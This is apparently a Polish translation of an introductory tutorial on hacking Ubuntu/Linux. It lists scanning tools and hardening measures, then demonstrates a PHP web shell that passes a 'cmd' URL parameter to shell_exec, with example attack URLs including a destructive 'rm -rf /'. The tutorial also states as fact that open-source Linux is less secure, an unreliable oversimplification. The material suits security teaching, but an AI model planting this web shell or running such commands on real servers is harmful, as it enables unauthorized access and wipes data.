Hakowanie systemu operacyjnego Linux: Hakowanie za pomocą Ubuntu (Samouczek poleceń)
Linux jest najpopularniejszym systemem operacyjnym dla serwerów, szczególnie dla serwerów internetowych. Jest to oprogramowanie typu open source; oznacza to, że każdy może mieć dostęp do kodu źródłowego. To sprawia, że jest on mniej bezpieczny w porównaniu z innymi systemami operacyjnymi, ponieważ atakujący mogą badać kod źródłowy w celu znalezienia luk w zabezpieczeniach. Linux for Hackers polega na wykorzystaniu tych luk w celu uzyskania nieautoryzowanego dostępu do systemu.
W tym artykule przedstawimy Ci, czym jest Linux, jakie są jego luki w zabezpieczeniach i jak hackować Ubuntu oraz środki zaradcze, które możesz zastosować.
Szybka notatka na temat Linuksa
Linux to system operacyjny typu open sourceIstnieje wiele dystrybucji systemów operacyjnych opartych na Linuksie, takich jak Redhat, Fedora i Ubuntu, itd. W przeciwieństwie do innych systemów operacyjnych, Linux jest mniej bezpieczny, jeśli chodzi o bezpieczeństwo. Wynika to z faktu, że kod źródłowy jest dostępny bezpłatnie, więc łatwo jest go zbadać pod kątem luk i wykorzystać je w porównaniu z innymi systemami operacyjnymi, które nie są open source. Linux może być używany jako system operacyjny serwera, komputera stacjonarnego, tabletu lub urządzenia mobilnego.
Programy Linux mogą być obsługiwane za pomocą GUI lub poleceń. Polecenia Linux dla Kali Linux hakowanie jest bardziej skuteczne i wydajne w porównaniu do korzystania z GUI. Z tego powodu przydatna jest znajomość podstawowych poleceń Linuksa do hakowania.
Zapoznaj się z tymi tutorialami https://www.guru99.com/unix-linux-tutorial.html o tym, jak zacząć Kali Linux hacki.
Narzędzia hakerskie dla Linuksa
- Nessus– do czego można wykorzystać to narzędzie Ubuntu hackuj, skanuj ustawienia konfiguracji, poprawki i sieci itp. można je znaleźć pod adresem https://www.tenable.com/products/nessus
- NMapa. Tego narzędzia można używać do monitorowania hostów działających na serwerze i usług, z których korzystają. Można go również używać do skanowania w poszukiwaniu portów. Można go znaleźć pod adresem https://nmap.org/
- SARA – SARA to skrót od Asystent ds. badań audytora bezpieczeństwa. Jak sama nazwa wskazuje, narzędzie to może służyć do audytu sieci pod kątem zagrożeń takich jak SQL Injection, XSS itp. można je znaleźć pod adresem http://www-arc.com/sara/sara.html
Powyższa lista nie jest wyczerpująca; daje wyobrażenie o dostępnych narzędziach Ubuntu hakowanie i hakowanie systemów Linux.
Jak zapobiegać włamaniom do systemu Linux
Linux Hacking wykorzystuje luki w zabezpieczeniach systemu operacyjnego. Organizacja może przyjąć następującą politykę, aby chronić się przed takimi atakami.
- Zarządzanie poprawkami– poprawki naprawiają błędy, które atakujący wykorzystują do złamania zabezpieczeń systemu. Dobra polityka zarządzania poprawkami zapewni ciągłe instalowanie odpowiednich poprawek w systemie.
- Prawidłowa konfiguracja systemu operacyjnego– inne exploity wykorzystują słabości w konfiguracji serwera. Nieaktywne nazwy użytkowników i demony powinny zostać wyłączone. Domyślne ustawienia, takie jak typowe hasła do aplikacji, domyślne nazwy użytkowników i niektóre numery portów powinny zostać zmienione.
- System wykrywania intruzów– narzędzia takie mogą służyć do wykrywania nieuprawnionego dostępu do systemu. Niektóre narzędzia mają zdolność wykrywania takich ataków i zapobiegania im.
Aktywność hakerska: Hakowanie a Ubuntu System Linux korzystający z PHP
W tym praktycznym scenariuszu nauczymy się hakować Ubuntu a my przekażemy Ci podstawowe informacje o tym jak możesz z niego skorzystać PHP skompromitować Linuksa. Nie będziemy atakować żadnej ofiary. Jeśli chcesz to wypróbować, możesz zainstalować LAMPP na swoim komputerze lokalnym.
PHP zawiera dwie funkcje, których można używać do wykonywania poleceń hakerskich w systemie Linux. Posiada funkcje exec() i Shell_exec(). Funkcja exec() zwraca ostatnią linię wyniku polecenia, podczas gdy funkcja Shell_exec() zwraca cały wynik polecenia w postaci ciągu znaków.
W celach demonstracyjnych załóżmy, że atakujący przesyła poniższy plik na serwer WWW.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
TUTAJ,
Powyższy skrypt pobiera polecenie ze zmiennej GET o nazwie cmd. Polecenie jest wykonywane przy użyciu metody Shell_exec(), a wyniki zwracane są w przeglądarce.
Powyższy kod można wykorzystać, korzystając z następującego adresu URL
http://localhost/cp/konsole.php?cmd=ls%20-l
TUTAJ,
- „…konsole.php?cmd=ls%20-l”przypisuje wartość ls –l zmiennej cmd.
Polecenie w Ubuntu za włamanie na serwer zostanie wykonane jako
shell_exec('ls -l') ;
Wykonanie powyższego kodu na serwerze WWW daje wyniki podobne do poniższych.
Powyższe polecenie po prostu wyświetla pliki w bieżącym katalogu i uprawnienia
Załóżmy, że atakujący przekazuje następujące polecenie
rm -rf /
TUTAJ,
- „rm” usuwa pliki
- „rf” powoduje, że polecenie rm jest uruchamiane w trybie rekurencyjnym. Usuwanie wszystkich folderów i plików
- „/” instruuje polecenie, aby rozpocząć usuwanie plików z katalogu głównego
Adres URL ataku będzie wyglądał mniej więcej tak
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Podsumowanie
- Linux to popularny system operacyjny dla serwerów, komputerów stacjonarnych, tabletów i urządzeń mobilnych.
- Linux jest oprogramowaniem typu open source, a kod źródłowy może uzyskać każdy. Ułatwia to wykrycie luk. Jest to jeden z najlepszych systemów operacyjnych dla hakerów.
- Podstawowe i sieciowe polecenia hakerskie w Ubuntu są cenne dla hakerów Linuksa.
- Luki w zabezpieczeniach to słabość, którą można wykorzystać do naruszenia bezpieczeństwa systemu.
- Dobre zabezpieczenia mogą pomóc chronić system przed naruszeniem bezpieczeństwa przez osobę atakującą.